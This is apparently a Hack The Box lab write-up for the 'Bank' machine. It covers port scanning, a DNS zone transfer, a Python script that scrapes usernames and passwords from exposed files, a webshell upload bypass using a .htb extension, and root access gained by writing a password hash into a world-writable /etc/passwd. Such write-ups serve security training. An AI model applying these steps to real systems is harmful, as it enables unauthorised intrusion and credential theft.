HTB - Bank
Getting Root
Tools Used:
dig, dirsearch.py, python
Nmap
# Nmap 7.80 scan initiated Thu Mar 19 18:56:57 2020 as: nmap -sC -sV -p 22,53,80 -oA Bank 10.10.10.29
Nmap scan report for 10.10.10.29
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
| 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
| 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 19 18:57:12 2020 -- 1 IP address (1 host up) scanned in 15.09 secondsEnumeration
DNS
Enumerating DNS shows potential vhost to be used in our http enumeration
# Zone Tranfer
dig axfr bank.htb @10.10.10.29
; <<>> DiG 9.11.16-2-Debian <<>> axfr bank.htb @10.10.10.29
;; global options: +cmd
bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
bank.htb. 604800 IN NS ns.bank.htb.
bank.htb. 604800 IN A 10.10.10.29
ns.bank.htb. 604800 IN A 10.10.10.29
www.bank.htb. 604800 IN CNAME bank.htb.
bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
;; Query time: 54 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Thu Mar 19 19:37:51 EDT 2020
;; XFR size: 6 records (messages 1, bytes 171)
HTTP
# python3 dirsearch.py -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 220521
Error Log: /opt/dirsearch/logs/errors-20-03-19_20-31-36.log
Target: http://bank.htb
[20:31:36] Starting:
[20:31:36] 302 - 7KB - / -> login.php
[20:31:37] 301 - 305B - /uploads -> http://bank.htb/uploads/
[20:31:38] 301 - 304B - /assets -> http://bank.htb/assets/
[20:31:50] 301 - 301B - /inc -> http://bank.htb/inc/
[20:42:17] 403 - 288B - /server-status
[20:53:57] 301 - 314B - /balance-transfer -> http://bank.htb/balance-transfer/
Task Completed
Checking out /balance-transfer/
Checking any of the files show login accounts encrypted. See example below:
Custom python script to get all the usernames and password
#!/usr/bin/env python3
# Created By: squid22
# HTB Bank
import requests
import re
import time
url = "http://bank.htb/balance-transfer/"
r = requests.get(url)
data = r.text
#print(data)
f = re.findall(r'href="(\w+\.acc)"', data)
for files in f:
r = requests.get(url+files)
stuff = r.text
user = re.search(r'Email: (.*)', stuff)
username = user.group(1)
passwd = re.search(r'Password: (.*)', stuff)
password = passwd.group(1)
print(f"File Name: {files}")
print(f"Username: {username}")
print(f"Password: {password}")
print("========================================")
Running the script, shows a file that somehow was not encrypted
File Name: 68576f20e9732f1b2edc4df5b8533230.acc
Let's login to http://bank.htb/login.php using the credentials found.
Success!
Getting shell
From the Support link, we can upload files but it seems like we can only upload images. Viewing the source of the page, an interesting debug message states that using *.htb extension executes *.php files.
# mv webshell.php webshell.htbPrivilege Escalation
Method 1 - /etc/passwd
During enumeration, the /etc/passwd showed as world writable
www-data@bank:/var/www/bank/uploads$ stat /etc/passwd
File: '/etc/passwd'
Size: 1349 Blocks: 8 IO Block: 4096 regular file
Device: 801h/2049d Inode: 661044 Links: 1
Access: (0666/-rw-rw-rw-) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2020-03-20 06:03:09.092145868 +0200
Modify: 2020-03-20 06:03:05.884145943 +0200
Change: 2020-03-20 06:03:05.884145943 +0200
Birth: -
Generate a password using openssl: pass123
# openssl passwd --help
Usage: passwd [options] [passwords]
where options are
-crypt standard Unix password algorithm (default)
-1 MD5-based password algorithm
-apr1 MD5-based password algorithm, Apache variant
-salt string use provided salt
-in file read passwords from file
-stdin read passwords from stdin
-noverify never verify when reading password from terminal
-quiet no warnings
-table format output as table
-reverse switch table columns
# openssl passwd -1 pass123
$1$rptdxUK7$QM4amjM8hyLaeSmEIr.U31Edit the /etc/passwd file with the generated password.
# vim /etc/passwd
root:$1$rptdxUK7$QM4amjM8hyLaeSmEIr.U31:0:0:root:/root:/bin/bashLogin as root
www-data@bank:/run/shm$ su root
Password:
root@bank:/run/shm#
root@bank:/run/shm# id
uid=0(root) gid=0(root) groups=0(root)
root@bank:/run/shm#
root@bank:/run/shm#
root@bank:/run/shm# ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:b9:f4:a0
inet addr:10.10.10.29 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feb9:f4a0/64 Scope:Link
inet6 addr: dead:beef::250:56ff:feb9:f4a0/64 Scope:Global
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1532663 errors:33 dropped:156 overruns:0 frame:0
TX packets:1522107 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:287906340 (287.9 MB) TX bytes:713942880 (713.9 MB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:3393 errors:0 dropped:0 overruns:0 frame:0
TX packets:3393 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:348982 (348.9 KB) TX bytes:348982 (348.9 KB)
Method 2 - SUID executable
www-data@bank:/var/www/bank/uploads$ find / -perm -4000 -type f -ls 2>/dev/null
921605 112 -rwsr-xr-x 1 root root 112204 Jun 14 2017 /var/htb/bin/emergency
397109 8 -rwsr-xr-x 1 root root 5480 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
655904 484 -rwsr-xr-x 1 root root 492972 Aug 11 2016 /usr/lib/openssh/ssh-keysign
395220 328 -rwsr-xr-- 1 root messagebus 333952 Dec 7 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
921007 12 -rwsr-xr-x 1 root root 9808 Nov 24 2015 /usr/lib/policykit-1/polkit-agent-helper-1
403773 48 -rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
397102 36 -rwsr-xr-x 1 root root 35916 May 17 2017 /usr/bin/chsh
397137 48 -rwsr-xr-x 1 root root 45420 May 17 2017 /usr/bin/passwd
397136 44 -rwsr-xr-x 1 root root 44620 May 17 2017 /usr/bin/chfn
404048 20 -rwsr-xr-x 1 root root 18168 Nov 24 2015 /usr/bin/pkexec
397130 32 -rwsr-xr-x 1 root root 30984 May 17 2017 /usr/bin/newgrp
403576 20 -rwsr-xr-x 1 root root 18136 May 8 2014 /usr/bin/traceroute6.iputils
397103 68 -rwsr-xr-x 1 root root 66284 May 17 2017 /usr/bin/gpasswd
393513 156 -rwsr-xr-x 1 root root 156708 May 29 2017 /usr/bin/sudo
403601 72 -rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
397540 20 -rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
403655 316 -rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd
393288 40 -rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
393289 44 -rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6
397131 36 -rwsr-xr-x 1 root root 35300 May 17 2017 /bin/su
403434 32 -rwsr-xr-x 1 root root 30112 May 15 2015 /bin/fusermount
393504 88 -rwsr-xr-x 1 root root 88752 Nov 24 2016 /bin/mount
396269 68 -rwsr-xr-x 1 root root 67704 Nov 24 2016 /bin/umount
Last updated
